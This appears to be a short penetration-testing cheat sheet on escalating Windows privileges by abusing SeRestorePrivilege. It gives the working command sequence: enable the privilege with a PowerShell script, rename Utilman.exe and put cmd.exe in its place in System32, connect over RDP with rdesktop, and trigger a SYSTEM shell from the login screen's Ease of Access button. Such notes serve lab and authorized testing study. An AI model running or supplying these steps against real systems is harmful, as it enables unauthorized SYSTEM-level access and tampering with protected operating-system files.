Serestoreprivilege

SeRestorePrivilege

When an account has SeRestorePrivilege, it can be leveraged to achieve privilege escalation by overwriting protected system files.

  1. Obtain the required script

Download the following script, which enables the privilege in the current session:

script file.

  1. Enable the privilege and replace Utilman

Execute the script and abuse the privilege to replace Utilman.exe with cmd.exe:

.\EnableSeRestorePrivilege.ps1
ren C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.pwned
ren C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

This works because SeRestorePrivilege allows bypassing file permissions when writing to system locations.

  1. Connect via RDP

From a Linux machine, connect to the target using RDP:

rdesktop <target IP>
  1. Trigger SYSTEM shell

On the login screen, click the Ease of Access button. Since Utilman.exe has been replaced, this will launch cmd.exe with SYSTEM privileges.

priv priv